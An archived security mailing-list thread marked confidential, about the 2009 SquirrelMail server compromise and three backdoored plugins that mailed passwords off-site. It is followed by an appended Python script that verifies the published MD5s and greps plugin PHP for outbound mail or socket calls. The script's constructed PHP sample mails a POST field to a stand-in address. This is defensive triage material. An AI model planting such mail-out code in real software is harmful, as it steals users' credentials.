[nsp-sec] [Confidential] Webmail issue.
Robert Lowe
rlowe at auscert.org.au
Sun Aug 2 19:48:06 EDT 2009
Hi all,
SquirrelMail have posted an update regarding this incident:
http://squirrelmail.org/index.php
SECURITY: SquirrelMail Webserver Compromise Update, and Plugin Status
Jul 31, 2009 by Jonathan Angliss
We apologise for the extended downtime for the SquirrelMail plugins
repository, and some of the SquirrelMail site documentation.
Plugins Compromise
During the initial announcement, we'd mentioned that we did not believe that
any of the plugins had been compromised. Further investigation has shown
that the following plugins were indeed compromised:
* sasql-3.2.0
* multilogin-2.4-1.2.9
* change_pass-3.0-1.4.0
Parts of these code changes attempt to send mail to an offsite server
containing passwords. We cannot establish a timeline of when these plugins
were compromised. If you are a user of these plugins, it is strongly
recommended you download a fresh copy from the plugins repository. MD5s for
the good versions are below:
a492922e5b0d2245d4e9bc255a7c5755 sasql-3.2.0.tar.gz
b143f2dc82f9e98dd43c632855255075 multilogin-2.4-1.2.9.tar.gz
2cff7c5d4f6f5d8455683bb5d96bb9fe change_pass-3.0-1.4.0.tar.gz
Plugins Availability
As of now, the plugins are available to download again. I personally
apologise for the extended outage of this, as I know some of you have been
eager to get these back up and running again. Once again, if you notice any
issues with the site, feel free to email.
Scott, thanks very much for the initial heads up - much appreciated.
Regards,
Rob.
> -----Original Message-----
> From: nsp-security-bounces at puck.nether.net [mailto:nsp-security-
> bounces at puck.nether.net] On Behalf Of Scott A. McIntyre
> Sent: Wednesday, 17 June 2009 4:16 PM
> To: NSP-SEC List
> Subject: [nsp-sec] [Confidential] Webmail issue.
>
> ----------- nsp-security Confidential --------
>
> All,
>
> I can't yet reveal all of the details and the information I'm about to
> share is for NSP-SEC *ONLY* - do not under any circumstances blog,
> tweet, MySpace, FriendIn, LinkedFace (whatever) or call Krebs about
> this.
>
> There are strong indications that Squirrelmail.org has been
> compromised. What was initially thought to be a SVN account
> compromise has shown to be root level system access. Code has been
> changed, plugins modified, and the Apache httpd was interfered with to
> attempt to load a new (details still to come) module.
>
> Backdoors were installed in various plugins.
>
> The initial compromise was *thought* to be between 1400 and 1600 on 16
> June 2009 (UTC) but subsequent investigation shows it may have been
> going on for "a few weeks."
>
> Details are still coming in, and are quite sketchy, but given the
> popularity of SquirrelMail within the NSP community as a customer-
> facing webmail package I wanted to give NSP-Sec a heads up on the
> matter.
>
> As I know more definitive information, I'll share it with the
> community.
>
> Regards,
>
> Scott A. McIntyre
> XS4ALL Internet B.V.
>
>
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-
> security
> community. Confidentiality is essential for effective Internet security
> counter-measures.
> _______________________________________________
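The update above tells operators of the three named plugins to re-download them and compare against the published MD5s, and it describes the backdoor only as code that tries to mail data off-site. The script below is an added example (not SquirrelMail's code and not part of either e-mail) of how a practitioner would act on that: it checksums each tarball in a download directory against the published values from the announcement, and it greps extracted plugin PHP for outbound-mail calls (mail(), fsockopen()) as a triage heuristic. The fixture files, the tarball names in the fixture and the PHP snippet are constructed here for the demonstration; the regex is an assumption about what a mail-sending backdoor would need to call, not a signature of the actual compromised code, so any hit still needs a manual read of that line. MD5 is used only because those are the hashes the project published.

```python
import hashlib
import os
import re
import tempfile

# "Good" MD5s exactly as published in the SquirrelMail update quoted above.
PUBLISHED_MD5 = {
    "sasql-3.2.0.tar.gz": "a492922e5b0d2245d4e9bc255a7c5755",
    "multilogin-2.4-1.2.9.tar.gz": "b143f2dc82f9e98dd43c632855255075",
    "change_pass-3.0-1.4.0.tar.gz": "2cff7c5d4f6f5d8455683bb5d96bb9fe",
}


def md5_file(path, chunk=65536):
    """Stream a file through MD5 and return the lowercase hex digest."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def check_downloads(directory, expected=PUBLISHED_MD5):
    """Compare each expected tarball in `directory` with its published MD5.

    Returns {filename: "ok" | "MISMATCH" | "missing"}.  A MISMATCH means the
    copy on disk is not the version the project vouched for and should be
    treated as untrusted until replaced from the repository.
    """
    results = {}
    for name, want in expected.items():
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            results[name] = "missing"
            continue
        got = md5_file(path)
        results[name] = "ok" if got == want.lower() else "MISMATCH"
    return results


# Heuristic (assumption, not a signature of the real backdoor): PHP that
# mails data off-site has to call mail() or open a socket itself.
OUTBOUND_CALL = re.compile(r"\b(mail|fsockopen)\s*\(", re.IGNORECASE)


def find_outbound_calls(php_source):
    """Return [(line_number, stripped_line)] for every outbound call found."""
    return [
        (n, line.strip())
        for n, line in enumerate(php_source.splitlines(), 1)
        if OUTBOUND_CALL.search(line)
    ]


# Constructed PHP sample for the demo; not code from any SquirrelMail plugin.
CONSTRUCTED_PHP = """<?php
// constructed sample, not real plugin code
function plugin_init() {
    $value = $_POST['field'];
    mail('someone@example.invalid', 'subject', $value);
    return true;
}
"""


def build_constructed_fixture():
    """Write constructed files into a temp dir so the checker can run offline.

    Returns (directory, expected) where `expected` lists three constructed
    names: one whose MD5 matches, one tampered copy, one never downloaded.
    """
    directory = tempfile.mkdtemp(prefix="sm-plugins-")
    good = b"abc"                       # md5 900150983cd24fb0d6963f7d28e17f72
    with open(os.path.join(directory, "good.tar.gz"), "wb") as f:
        f.write(good)
    with open(os.path.join(directory, "tampered.tar.gz"), "wb") as f:
        f.write(good + b"\n")           # one extra byte: digest no longer matches
    expected = {
        "good.tar.gz": hashlib.md5(good).hexdigest(),
        "tampered.tar.gz": hashlib.md5(good).hexdigest(),
        "absent.tar.gz": "00000000000000000000000000000000",
    }
    return directory, expected


if __name__ == "__main__":
    fixture_dir, expected = build_constructed_fixture()
    for name, status in check_downloads(fixture_dir, expected).items():
        print(f"{status:9s} {name}")
    for lineno, text in find_outbound_calls(CONSTRUCTED_PHP):
        print(f"review line {lineno}: {text}")
```

To use it against a real download directory, replace the fixture with `check_downloads("/path/to/downloads")` so the published table is used, and run `find_outbound_calls()` over each .php file in the extracted plugin tree; change_pass and similar plugins may legitimately send mail, so a hit is a line to read, not a verdict.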